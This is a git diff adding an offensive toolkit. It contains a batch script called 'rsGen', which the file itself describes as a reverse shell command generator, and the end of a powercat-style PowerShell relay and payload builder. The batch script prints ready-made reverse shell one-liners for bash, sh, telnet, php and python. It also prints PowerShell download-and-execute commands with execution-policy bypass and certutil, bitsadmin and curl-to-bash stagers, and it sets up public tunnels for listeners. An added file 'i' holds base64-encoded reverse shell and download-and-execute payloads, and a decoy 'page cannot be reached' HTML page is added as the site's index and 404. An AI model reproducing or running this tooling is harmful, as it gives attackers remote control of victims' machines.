+ Write-Verbose "Writing input to Stream 1..." + try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars} + catch{Write-Host "Failed to write input to Stream 1" ; return} + } + + if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return} + + Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..." + while($True) + { + try + { + $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars + if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100} + if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars} + $Data = $null + } + catch + { + Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return + } + + try + { + $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars + if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100} + if($Data -ne $null){$Stream2Vars = Stream2_WriteData $Data $Stream2Vars} + $Data = $null + } + catch + { + Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return + } + } + } + finally + { + try + { + #Write-Verbose "Closing Stream 2..." + Stream2_Close $Stream2Vars + } + catch + { + Write-Verbose "Failed to close Stream 2" + } + try + { + #Write-Verbose "Closing Stream 1..." + Stream1_Close $Stream1Vars + } + catch + { + Write-Verbose "Failed to close Stream 1" + } + } + } + ########## MAIN FUNCTION ########## + + ########## GENERATE PAYLOAD ########## + if($u) + { + Write-Verbose "Set Stream 1: UDP" + $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n") + $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n") + $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n") + $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n") + if($l){$InvokeString = "Main @('',`$True,'$p','$t') "} + else{$InvokeString = "Main @('$c',`$False,'$p','$t') "} + } + elseif($dns -ne "") + { + Write-Verbose "Set Stream 1: DNS" + $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n") + $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n") + $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n") + $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n") + if($l){return "This feature is not available."} + else{$InvokeString = "Main @('$c','$p','$dns',$dnsft) "} + } + else + { + Write-Verbose "Set Stream 1: TCP" + $FunctionString = ("function Stream1_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n") + $FunctionString += ("function Stream1_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n") + $FunctionString += ("function Stream1_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n") + $FunctionString += ("function Stream1_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n") + if($l){$InvokeString = "Main @('',`$True,$p,$t) "} + else{$InvokeString = "Main @('$c',`$False,$p,$t) "} + } + + if($e -ne "") + { + Write-Verbose "Set Stream 2: Process" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_CMD} + "`n}`n`n") + $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_CMD} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_CMD} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_CMD} + "`n}`n`n") + $InvokeString += "@('$e')`n`n" + } + elseif($ep) + { + Write-Verbose "Set Stream 2: Powershell" + $InvokeString += "`n`n" + } + elseif($r -ne "") + { + if($r.split(":")[0].ToLower() -eq "udp") + { + Write-Verbose "Set Stream 2: UDP" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_UDP} + "`n}`n`n") + $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_UDP} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_UDP} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_UDP} + "`n}`n`n") + if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")} + elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")} + else{return "Bad relay format."} + } + if($r.split(":")[0].ToLower() -eq "dns") + { + Write-Verbose "Set Stream 2: DNS" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_DNS} + "`n}`n`n") + $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_DNS} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_DNS} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_DNS} + "`n}`n`n") + if($r.split(":").Count -eq 2){return "This feature is not available."} + elseif($r.split(":").Count -eq 4){$InvokeString += ("@('" + $r.split(":")[1] + "','" + $r.split(":")[2] + "','" + $r.split(":")[3] + "',$dnsft) ")} + else{return "Bad relay format."} + } + elseif($r.split(":")[0].ToLower() -eq "tcp") + { + Write-Verbose "Set Stream 2: TCP" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_TCP} + "`n}`n`n") + $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_TCP} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_TCP} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_TCP} + "`n}`n`n") + if($r.split(":").Count -eq 2){$InvokeString += ("@('',`$True,'" + $r.split(":")[1] + "','$t') ")} + elseif($r.split(":").Count -eq 3){$InvokeString += ("@('" + $r.split(":")[1] + "',`$False,'" + $r.split(":")[2] + "','$t') ")} + else{return "Bad relay format."} + } + } + else + { + Write-Verbose "Set Stream 2: Console" + $FunctionString += ("function Stream2_Setup`n{`n" + ${function:Setup_Console} + "`n}`n`n") + $FunctionString += ("function Stream2_ReadData`n{`n" + ${function:ReadData_Console} + "`n}`n`n") + $FunctionString += ("function Stream2_WriteData`n{`n" + ${function:WriteData_Console} + "`n}`n`n") + $FunctionString += ("function Stream2_Close`n{`n" + ${function:Close_Console} + "`n}`n`n") + $InvokeString += ("@('" + $o + "')") + } + + if($ep){$FunctionString += ("function Main`n{`n" + ${function:Main_Powershell} + "`n}`n`n")} + else{$FunctionString += ("function Main`n{`n" + ${function:Main} + "`n}`n`n")} + $InvokeString = ($FunctionString + $InvokeString) + ########## GENERATE PAYLOAD ########## + + ########## RETURN GENERATED PAYLOADS ########## + if($ge){Write-Verbose "Returning Encoded Payload..." ; return [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($InvokeString))} + elseif($g){Write-Verbose "Returning Payload..." ; return $InvokeString} + ########## RETURN GENERATED PAYLOADS ########## + + ########## EXECUTION ########## + $Output = $null + try + { + if($rep) + { + while($True) + { + $Output += IEX $InvokeString + Start-Sleep -s 2 + Write-Verbose "Repetition Enabled: Restarting..." + } + } + else + { + $Output += IEX $InvokeString + } + } + finally + { + if($Output -ne $null) + { + if($of -eq ""){$Output} + else{[io.file]::WriteAllBytes($of,$Output)} + } + } + ########## EXECUTION ########## +} diff --git a/include/pgrok.exe b/include/pgrok.exe new file mode 100644 index 0000000..1848f62 Binary files /dev/null and b/include/pgrok.exe differ diff --git a/include/www/404.html b/include/www/404.html new file mode 100644 index 0000000..b784469 --- /dev/null +++ b/include/www/404.html @@ -0,0 +1,167 @@ + + + + + 无法访问此页面 + + + + + +
+
无法访问此页面
+
+ + +
+
+ + + + +
+ 详细信息 +
+
+

找不到此网站。

+

错误代码: INET_E_RESOURCE_NOT_FOUND

+
+
+
+
+
+
+ + + \ No newline at end of file diff --git a/include/www/i b/include/www/i new file mode 100644 index 0000000..b152d8c --- /dev/null +++ b/include/www/i @@ -0,0 +1 @@ +L2Jpbi9iYXNoIC1pPiYvZGV2L3RjcC8xOTIuMTY4LjEuMS84ODg4IDA+JjE=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAOgA4ADAALwBwAGMAYQB0AC4AcABzADEAJwApADsAcABjAGEAdAAgAC0AYwAgADEAOQAyAC4AMQA2ADgALgAxAC4AMQAgAC0AcAAgADgAOAA4ADgAIAAtAGUAIABjAG0AZAA= diff --git a/include/www/index.html b/include/www/index.html new file mode 100644 index 0000000..b784469 --- /dev/null +++ b/include/www/index.html @@ -0,0 +1,167 @@ + + + + + 无法访问此页面 + + + + + +
+
无法访问此页面
+
+ + +
+
+ + + + +
+ 详细信息 +
+
+

找不到此网站。

+

错误代码: INET_E_RESOURCE_NOT_FOUND

+
+
+
+
+
+
+ + + \ No newline at end of file diff --git a/rsGen.bat b/rsGen.bat new file mode 100644 index 0000000..8f22559 --- /dev/null +++ b/rsGen.bat @@ -0,0 +1,813 @@ +@if (@rsgen) == (@RSGEN) @end /***** JS +@echo off +title rsGen - Reverse Shell Command Genrator by Flyfish + +::main +:rs_main_start +setlocal enableDelayedExpansion +call :rs_os_detect_start +if "%~1" equ "" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + goto rs_help_start +) else ( + set rs_listen_host= + set rs_listen_host=%~1 + + if "%~2" equ "" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + echo,&echo -Missing port argument + ) else ( + call :rs_banner_w7_start + echo, + powershell -c write-host "' - Missing port argument'" -f red -n 2>nul + ) + goto rs_help_start + ) else ( + set rs_listen_port= + set rs_listen_port=%~2 + + if /i "%2"=="-ngrok" ( + set rs_ngrok= + set rs_listen_port=%~1 + + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + + call :rs_local_listen_start %~1 + call :rs_ngrok_start + + if !rs_ngrok! == 0 ( + call :rs_command_generate_pub_start !rs_ngrok_host! !rs_ngrok_port! + ) else ( + powershell -c write-host "' - Get ngrok tunnel url timeout.'" -f red -n 2>nul + echo, + goto :eof + ) + + if "!rs_os_flag!"=="W10" ( + call :rs_info_w10windows_start + call :rs_windows_command_raw_start !rs_ngrok_host! !rs_ngrok_port! + call :rs_command_generate_pub_outpub_windowsw10_start + call :rs_info_w10linux_start + call :rs_linux_command_raw_start !rs_ngrok_host! !rs_ngrok_port! + call :rs_command_generate_pub_outpub_linuxw10_start + call :rs_info_wlinux10_start + call :rs_command_generate_pub_outpub_wl10_start + ) else ( + call :rs_info_w7windows_start + call :rs_windows_command_raw_start !rs_ngrok_host! !rs_ngrok_port! + call :rs_command_generate_pub_outpub_windowsw7_start + call :rs_info_w7linux_start + call :rs_linux_command_raw_start !rs_ngrok_host! !rs_ngrok_port! + call :rs_command_generate_pub_outpub_linuxw7_start + call :rs_info_wlinux7_start + call :rs_command_generate_pub_outpub_wl7_start + ) + + ) + + if /i "%2"=="-pgrok" ( + set rs_pgrok= + set rs_listen_port=%~1 + + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + + call :rs_local_listen_start %~1 + call :rs_pgrok_start + + if !rs_pgrok! == 0 ( + call :rs_command_generate_pub_start !rs_pgrok_host! !rs_pgrok_port! + ) else ( + powershell -c write-host "' - Get pgrok tunnel url timeout.'" -f red -n 2>nul + echo, + goto :eof + ) + + if "!rs_os_flag!"=="W10" ( + call :rs_info_w10windows_start + call :rs_windows_command_raw_start !rs_pgrok_host! !rs_pgrok_port! + call :rs_command_generate_pub_outpub_windowsw10_start + call :rs_info_w10linux_start + call :rs_linux_command_raw_start !rs_pgrok_host! !rs_pgrok_port! + call :rs_command_generate_pub_outpub_linuxw10_start + call :rs_info_wlinux10_start + call :rs_command_generate_pub_outpub_wl10_start + ) else ( + call :rs_info_w7windows_start + call :rs_windows_command_raw_start !rs_pgrok_host! !rs_pgrok_port! + call :rs_command_generate_pub_outpub_windowsw7_start + call :rs_info_w7linux_start + call :rs_linux_command_raw_start !rs_pgrok_host! !rs_pgrok_port! + call :rs_command_generate_pub_outpub_linuxw7_start + call :rs_info_wlinux7_start + call :rs_command_generate_pub_outpub_wl7_start + ) + + ) + + call :rs_check_port_start !rs_listen_port! + if "!rs_value_type!"=="1" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + echo,&echo -Wrong port argument + ) else ( + call :rs_banner_w7_start + echo, + powershell -c write-host "' - Wrong port argument'" -f red -n 2>nul + ) + goto rs_help_start + ) else ( + set rs_webport=80 + + if not "%3"=="" ( + for %%i in (%3 %4 %5 %6 %7 %8) do ( + if /i "%%i"=="-pub" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + echo + Host:Port ^<==^> %~1:%~2 + call :rs_command_generate_pub_start %~1 %~2 + call :rs_info_w10windows_start + call :rs_command_generate_pub_outpub_windowsw10_start + call :rs_info_w10linux_start + call :rs_command_generate_pub_outpub_linuxw10_start + call :rs_info_wlinux10_start + call :rs_command_generate_pub_outpub_wl10_start + ) else ( + call :rs_banner_w7_start + echo + Host:Port ^<==^> %~1:%~2 + call :rs_command_generate_pub_start %~1 %~2 + call :rs_info_w7windows_start + call :rs_command_generate_pub_outpub_windowsw7_start + call :rs_info_w7linux_start + call :rs_command_generate_pub_outpub_linuxw7_start + call :rs_info_wlinux7_start + call :rs_command_generate_pub_outpub_wl7_start + ) + ) + if /i "%%i"=="-lan" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + call :rs_command_lan_start %~1 %~2 + ) + if /i "%%i"=="-listen" ( + call :rs_local_listen_start %~2 + ) + + if /i "%%i"=="-ngrok" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + echo Please try "%~nx0 -ngrok" + goto rs_help_start + ) + + if /i "%%i"=="-pgrok" ( + if "!rs_os_flag!"=="W10" ( + call :rs_banner_w10_start + ) else ( + call :rs_banner_w7_start + ) + echo Please try "%~nx0 -pgrok" + goto rs_help_start + ) + ) + + ) else ( + if not "%2"=="-ngrok" ( + if not "%2"=="-pgrok" ( + if "!rs_os_flag!"=="W10" ( + echo + Host:Port ^<==^> %~1:%~2 + call :rs_info_w10windows_start + call :rs_windows_command_raw_start %~1 %~2 + call :rs_info_w10linux_start + call :rs_linux_command_raw_start %~1 %~2 + ) else ( + echo + Host:Port ^<==^> %~1:%~2 + call :rs_info_w7windows_start + call :rs_windows_command_raw_start %~1 %~2 + call :rs_info_w7linux_start + call :rs_linux_command_raw_start %~1 %~2 + ) + ) + ) + ) + + call :rs_clean_tempfile_start + ) + ) +) +endlocal +goto :eof +:rs_main_end + +::Detect system version using ANSI color +:rs_os_detect_start +for /f "tokens=4-7 delims=[]. " %%i in ('ver') do ( + set /a_majorminor=%%i * 100 + %%j + set /a_build=%%k0 /10 + set /a_revision=%%l0 /10 +) +set "rs_os_flag=" +if %_majorminor% geq 1000 ( + if %_build% gtr 10586 ( + set rs_os_flag=W10 + ) +) else ( + set rs_os_flag=-1 + if %_build% equ 10586 ( + if %_revision% geq 11 ( + set rs_os_flag=W10 + ) + ) +) +:rs_os_detect_end + +::Check port format +:rs_check_port_start +set rs_value= +set rs_value=%1 +echo %rs_value%|findstr "^[0-9]*$">nul +if %errorlevel% equ 0 ( + set rs_value_type=0 +) else ( + set rs_value_type=1 +) +goto :eof +:rs_check_prot_end + +::Find available ports +:rs_set_webport_start +netstat -o -n -a | find /i "LISTENING" | find ":%rs_webport% " > NUL +if "%ERRORLEVEL%" equ "0" ( + set /a rs_webport +=1 + goto rs_set_webport_start +) else ( + set rs_webport=%rs_webport% +) +goto :eof +:rs_set_webport_end + +::base64 encode +:rs_base64_encode_start +set /p"%temp%\rs_temp_input.rsg" +certutil -f -encode "%temp%\rs_temp_input.rsg" "%temp%\rs_temp_output.rsg">nul +for /f %%i in ('findstr /b /c:"-" /v "%temp%\rs_temp_output.rsg"') do ( + set "rsgen_b64_res=%%i" +) +:rs_base64_encode_ende + +::Clean temporary files +:rs_clean_tempfile_start +if exist "%temp%\rs_temp_input.rsg" del /q %temp%\rs_temp_input.rsg +if exist "%temp%\rs_temp_output.rsg" del /q %temp%\rs_temp_output.rsg +goto :eof +:rs_clean_tempfile_end + +::Listen to the local port +:rs_local_listen_start +set rs_listen_port= +set rs_listen_port=%1 +if exist "%cd%\include\pcat.ps1" ( + echo + Listening on port 0.0.0.0:!rs_listen_port! + start "Listening port !rs_listen_port!" cmd /c powershell -ep bypass -c "Import-Module %cd%\include\pcat.ps1;pcat -l -p !rs_listen_port! -v -t 600" 2>nul +) else ( + powershell -c write-host "' - Unable to start listening,Missing file %cd%\include\pcat.ps1.'" -f red -n 2>nul + goto rs_help_start +) + +goto :eof +:rs_local_listen_end + +::rs_ngrok +:rs_ngrok_start +if exist "%cd%\include\ngrok.exe" ( + taskkill /f /im ngrok.exe >nul 2>nul + start "Expose a TCP based service running on port !rs_listen_port!" cmd /c %cd%\include\ngrok.exe tcp !rs_listen_port! -config=%cd%\include\ngrok.yml 2>nul + + set rs_ngrok= + set rs_n=0 + FOR /L %%i in (1,1,30) do ( + set /a rs_n=!rs_n!+1 + %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/api/tunnels|find /i "ngrok.io" >nul&&set rs_ngrok=0 + if !rs_ngrok! == 0 goto :rs_ngrok_host + ) + + :rs_ngrok_host + if !rs_ngrok! == 0 ( + FOR /F "tokens=9 delims==://" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/api/tunnels') do (set rs_ngrok_host=%%i) + FOR /F tokens^=11^ delims^=^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/api/tunnels') do (set rs_ngrok_port=%%i) + + set rs_listen_host= + set rs_listen_host=!rs_ngrok_host! + echo + Starting the ngrok tcp tunnel 127.0.0.1:!rs_listen_port! ^<==^> !rs_ngrok_host!:!rs_ngrok_port! + rem echo !rs_ngrok_host! + rem echo !rs_ngrok_port! + rem echo !rs_n! time... + ) + goto :eof + +) else ( + echo, + powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\ngrok.exe.'" -f red -n 2>nul + goto :rs_help_start +) +goto :eof +:rs_ngrok_end + +::rs_pgrok +:rs_pgrok_start +if exist "%cd%\include\pgrok.exe" ( + taskkill /f /im pgrok.exe >nul 2>nul + start "Expose a TCP based service running on port !rs_listen_port!" cmd /c %cd%\include\pgrok.exe -proto=tcp !rs_listen_port! 2>nul + + set rs_pgrok= + set rs_n=0 + FOR /L %%i in (1,1,30) do ( + set /a rs_n=!rs_n!+1 + %cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in|find /i "ejemplo.me" >nul&&set rs_pgrok=0 + if !rs_pgrok! == 0 goto :rs_pgrok_host + ) + + :rs_pgrok_host + if !rs_pgrok! == 0 ( + FOR /F tokens^=11^ delims^=^/^\^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in^|find /i "tcp://"') do (set rs_pgrok_host=%%i) + FOR /F tokens^=12^ delims^=^/^\^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in^|find /i "tcp://"') do (set rs_pgrok_port=%%i) + + set rs_listen_host= + set rs_listen_host=!rs_pgrok_host! + echo + Starting the pgrok tcp tunnel 127.0.0.1:!rs_listen_port! ^<==^> !rs_pgrok_host!:!rs_pgrok_port! + rem echo "!rs_pgrok_host!" "!rs_pgrok_port!" + rem echo !rs_n! time... + ) + goto :eof + +) else ( + echo, + powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\pgrok.exe.'" -f red -n 2>nul + goto :rs_help_start +) +goto :eof +:rs_pgrok_end + +::Raw command format output +:rs_windows_command_raw_start +set rs_listen_host= +set rs_listen_port= +set rs_listen_host=%1 +set rs_listen_port=%2 +if "!rs_os_flag!"=="W10" ( + echo  powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'^);powercat -c !rs_listen_host! -p !rs_listen_port! -e cmd + echo, +) else ( + echo powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'^);powercat -c !rs_listen_host! -p !rs_listen_port! -e cmd +) +goto :eof +:rs_windows_command_raw_end + +:rs_linux_command_raw_start +set rs_listen_host= +set rs_listen_port= +set rs_listen_host=%1 +set rs_listen_port=%2 +if "!rs_os_flag!"=="W10" ( + echo  bash -i^>^&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0^>^&1 + echo, + echo  sh -i^>^&/dev/udp/!rs_listen_host!/!rs_listen_port! 0^>^&1 + echo, + echo  0^<^&196;exec 196^<^>/dev/tcp/!rs_listen_host!/!rs_listen_port!; sh ^<^&196 ^>^&196 2^>^&196 + echo, + echo  telnet !rs_listen_host! !rs_listen_port!^|/bin/bash^|telnet !rs_listen_host! 1521 + ::echo  ps:Need to additionally listen a port 1521 for command output display + echo, + echo  php -r '$sock=fsockopen^("!rs_listen_host!",!rs_listen_port!^);exec^("/bin/sh -i <&3 >&3 2>&3"^);' + echo, + echo  python -c 'import socket,subprocess,os;s=socket.socket^(socket.AF_INET,socket.SOCK_STREAM^);s.connect^(^("!rs_listen_host!",!rs_listen_port!^)^);os.dup2^(s.fileno^(^),0^); os.dup2^(s.fileno^(^),1^);os.dup2^(s.fileno^(^),2^);import pty; pty.spawn^("/bin/bash"^)' + echo, +) else ( + echo bash -i^>^&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0^>^&1 + echo, + echo sh -i^>^&/dev/udp/!rs_listen_host!/!rs_listen_port! 0^>^&1 + echo, + echo 0^<^&196;exec 196^<^>/dev/tcp/!rs_listen_host!/!rs_listen_port!; sh ^<^&196 ^>^&196 2^>^&196 + echo, + echo telnet !rs_listen_host! !rs_listen_port!^|/bin/bash^|telnet !rs_listen_host! 1521 + ::echo ps:Need to additionally listen a port 1521 for command output display + echo, + echo php -r '$sock=fsockopen^("!rs_listen_host!",!rs_listen_port!^);exec^("/bin/sh -i <&3 >&3 2>&3"^);' + echo, + echo python -c 'import socket,subprocess,os;s=socket.socket^(socket.AF_INET,socket.SOCK_STREAM^);s.connect^(^("!rs_listen_host!",!rs_listen_port!^)^);os.dup2^(s.fileno^(^),0^); os.dup2^(s.fileno^(^),1^);os.dup2^(s.fileno^(^),2^);import pty; pty.spawn^("/bin/bash"^)' + echo, +) +goto :eof +:rs_linux_command_raw_end + +::LAN "transfer command" generation +:rs_command_lan_start +if not exist "%cd%\include\" ( + echo, + powershell -c write-host "' - Missing include directory,Unable to continue generate command!'" -f red -n >nul + ::Missing the include directory, the include directory contains the files "i" & "pcat.ps1", "i" is the generated command. + goto rs_help_start +) +if exist "%cd%\include\mongoose.exe" ( + tasklist|find /i "mongoose.exe">nul&&taskkill /f /im mongoose.exe >nul 2>nul + call :rs_set_webport_start + start %cd%\include\mongoose.exe -d %cd%\include\www -l !rs_webport! -start_browser no -enable_dir_listing no + rem mongoose.exe -d %cd%\www -l 80 -start_browser yes -enable_dir_listing no +) else ( + powershell -c write-host "' - Missing file `"%cd%\include\mongoose.exe`",The web service failed to start`,the LAN mode needs to start the web service locally`,so the command will not be executed effectively'" -f red -n 2>nul +) +set "rs_ps_command_pre_lan=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc " +set "ps_command_suf_raw_lan=IEX (New-Object System.Net.Webclient).DownloadString(''http://%rs_listen_host%:%rs_webport%/pcat.ps1'');pcat -c !rs_listen_host! -p !rs_listen_port! -e cmd" +set "linux_command_raw_lan=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0>&1" +call :rs_base64_encode_start "!linux_command_raw_lan!" +set rs_linux_command_b64_lan=%rsgen_b64_res% +powershell -c "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('%ps_command_suf_raw_lan%'))|out-file -Encoding ascii %temp%\rs_temp_input.rsg" +set /p rs_ps_command_suf_b64_lan=<%temp%\rs_temp_input.rsg +set "rs_command_b64_lan=!rs_linux_command_b64_lan!!rs_ps_command_pre_lan!!rs_ps_command_suf_b64_lan!" +echo !rs_command_b64_lan!>%cd%\include\www\i +call :rs_http_post_start "!rs_listen_host!" "%temp%\rs_temp_output.rsg" +set /p rs_ip2dec=<%temp%\rs_temp_output.rsg +if "!rs_os_flag!"=="W10" ( + if "!rs_webport!" equ "80" ( + set rs_webport_display= + ) else ( + set "rs_webport_display=:%rs_webport%" + ) + call :rs_info_w10windows_start + echo  powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('http://!rs_listen_host!!rs_webport_display!/pcat.ps1'^);pcat -c !rs_listen_host! -p !rs_listen_port! -e cmd + echo, + echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat + echo, + echo  powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^ + echo, + echo  bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%^\cd.bat^|cd.bat + echo, + + call :rs_info_w10linux_start + echo  curl http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo  curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo  wget -qO- http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, + + call :rs_info_wlinux10_start + echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo  powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo  bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%\cd.bat^|cd.bat^|^|curl http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, +) else ( + if "!rs_webport!" equ "80" ( + set rs_webport_display= + ) else ( + set "rs_webport_display=:%rs_webport%" + ) + call :rs_info_w7windows_start + echo powershell -Ep Bypass -NoLogo -NonI -NoP -c IEX^(New-Object System.Net.Webclient^).DownloadString^('http://!rs_listen_host!!rs_webport_display!/pcat.ps1'^);pcat -c !rs_listen_host! -p !rs_listen_port! -e cmd + echo, + echo certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat + echo, + echo powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat + echo, + echo bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%^\cd.bat^|cd.bat + echo, + + call :rs_info_w7linux_start + echo curl http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo wget -qO- http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, + + call :rs_info_wlinux7_start + echo certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash + echo, + echo bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%\cd.bat^|cd.bat^|^|curl http://!rs_ip2dec!!rs_webport_display!/i^|base64 -d^|bash + echo, +) +goto :eof +:rs_command_lan_end + +:rs_command_generate_pub_outpub_windowsw10_start +if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_pastebin_url!.txt cd.bat^|cd.bat +echo, +if "!rs_dpaste_status!"=="0" echo  certutil -urlcache -split -f !rs_dpaste_url!.txt cd.bat^|cd.bat +echo, +if "!rs_pastebin_status!"=="0" echo  bitsadmin /transfer n !rs_pastebin_url!.txt %%cd%%\cd.bat^|cd.bat +echo, +if "!rs_pastebin_status!"=="0" echo  powershell "Import-Module bitstransfer;start-bitstransfer !rs_pastebin_url!.txt cd.bat"^|cd.bat +echo, +goto :eof +:rs_command_generate_pub_outpub_windowsw10_end + +:rs_command_generate_pub_outpub_linuxw10_start +if "!rs_pastebin_status!"=="0" echo  curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo  curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo  wget -qO- !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo  wget -qO- !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +goto :eof 